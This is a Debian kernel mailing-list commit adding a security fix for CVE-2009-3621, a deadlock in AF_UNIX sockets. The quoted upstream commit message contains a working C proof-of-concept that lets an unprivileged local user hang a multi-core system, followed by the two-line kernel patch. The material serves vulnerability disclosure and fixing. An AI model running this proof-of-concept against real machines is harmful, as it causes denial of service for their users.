[kernel] r14475 - in dists/lenny-security/linux-2.6/debian: . patches/bugfix/all patches/series

Dann Frazier dannf at alioth.debian.org
Wed Oct 28 04:25:04 UTC 2009 

Author: dannf
Date: Wed Oct 28 04:25:02 2009
New Revision: 14475

Log:
AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)

Added:
   dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
Modified:
   dists/lenny-security/linux-2.6/debian/changelog
   dists/lenny-security/linux-2.6/debian/patches/series/19lenny2

Modified: dists/lenny-security/linux-2.6/debian/changelog
==============================================================================
--- dists/lenny-security/linux-2.6/debian/changelog	Wed Oct 28 04:23:09 2009	(r14474)
+++ dists/lenny-security/linux-2.6/debian/changelog	Wed Oct 28 04:25:02 2009	(r14475)
@@ -5,6 +5,7 @@
   * netlink: fix typo in initialization (CVE-2009-3612)
   * drm/r128: Add test for initialisation to all ioctls that require it
     (CVE-2009-3620)
+  * AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
 
  -- dann frazier <dannf at debian.org>  Tue, 27 Oct 2009 21:33:02 -0600
 

Added: dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
==============================================================================
--- /dev/null	00:00:00 1970	(empty, because file is newly added)
+++ dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch	Wed Oct 28 04:25:02 2009	(r14475)
@@ -0,0 +1,83 @@
+commit 77238f2b942b38ab4e7f3aced44084493e4a8675
+Author: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+Date:   Sun Oct 18 23:17:37 2009 -0700
+
+    AF_UNIX: Fix deadlock on connecting to shutdown socket
+    
+    I found a deadlock bug in UNIX domain socket, which makes able to DoS
+    attack against the local machine by non-root users.
+    
+    How to reproduce:
+    1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
+        namespace(*), and shutdown(2) it.
+     2. Repeat connect(2)ing to the listening socket from the other sockets
+        until the connection backlog is full-filled.
+     3. connect(2) takes the CPU forever. If every core is taken, the
+        system hangs.
+    
+    PoC code: (Run as many times as cores on SMP machines.)
+    
+    int main(void)
+    {
+    	int ret;
+    	int csd;
+    	int lsd;
+    	struct sockaddr_un sun;
+    
+    	/* make an abstruct name address (*) */
+    	memset(&sun, 0, sizeof(sun));
+    	sun.sun_family = PF_UNIX;
+    	sprintf(&sun.sun_path[1], "%d", getpid());
+    
+    	/* create the listening socket and shutdown */
+    	lsd = socket(AF_UNIX, SOCK_STREAM, 0);
+    	bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
+    	listen(lsd, 1);
+    	shutdown(lsd, SHUT_RDWR);
+    
+    	/* connect loop */
+    	alarm(15); /* forcely exit the loop after 15 sec */
+    	for (;;) {
+    		csd = socket(AF_UNIX, SOCK_STREAM, 0);
+    		ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
+    		if (-1 == ret) {
+    			perror("connect()");
+    			break;
+    		}
+    		puts("Connection OK");
+    	}
+    	return 0;
+    }
+    
+    (*) Make sun_path[0] = 0 to use the abstruct namespace.
+        If a file-based socket is used, the system doesn't deadlock because
+        of context switches in the file system layer.
+    
+    Why this happens:
+     Error checks between unix_socket_connect() and unix_wait_for_peer() are
+     inconsistent. The former calls the latter to wait until the backlog is
+     processed. Despite the latter returns without doing anything when the
+     socket is shutdown, the former doesn't check the shutdown state and
+     just retries calling the latter forever.
+    
+    Patch:
+     The patch below adds shutdown check into unix_socket_connect(), so
+     connect(2) to the shutdown socket will return -ECONREFUSED.
+    
+    Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+    Signed-off-by: Masanori Yoshida <masanori.yoshida.tv at hitachi.com>
+    Signed-off-by: David S. Miller <davem at davemloft.net>
+
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 51ab497..fc820cd 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1074,6 +1074,8 @@ restart:
+ 	err = -ECONNREFUSED;
+ 	if (other->sk_state != TCP_LISTEN)
+ 		goto out_unlock;
++	if (other->sk_shutdown & RCV_SHUTDOWN)
++		goto out_unlock;
+ 
+ 	if (unix_recvq_full(other)) {
+ 		err = -EAGAIN;

Modified: dists/lenny-security/linux-2.6/debian/patches/series/19lenny2
==============================================================================
--- dists/lenny-security/linux-2.6/debian/patches/series/19lenny2	Wed Oct 28 04:23:09 2009	(r14474)
+++ dists/lenny-security/linux-2.6/debian/patches/series/19lenny2	Wed Oct 28 04:25:02 2009	(r14475)
@@ -2,3 +2,4 @@
 + bugfix/all/random-make-get_random_int-more-random.patch
 + bugfix/all/netlink-fix-typo-in-initialization.patch
 + bugfix/all/drm+r128-Add-test-for-init-to-all-reqd-ioctls.patch
++ bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch

More information about the Kernel-svn-changes mailing list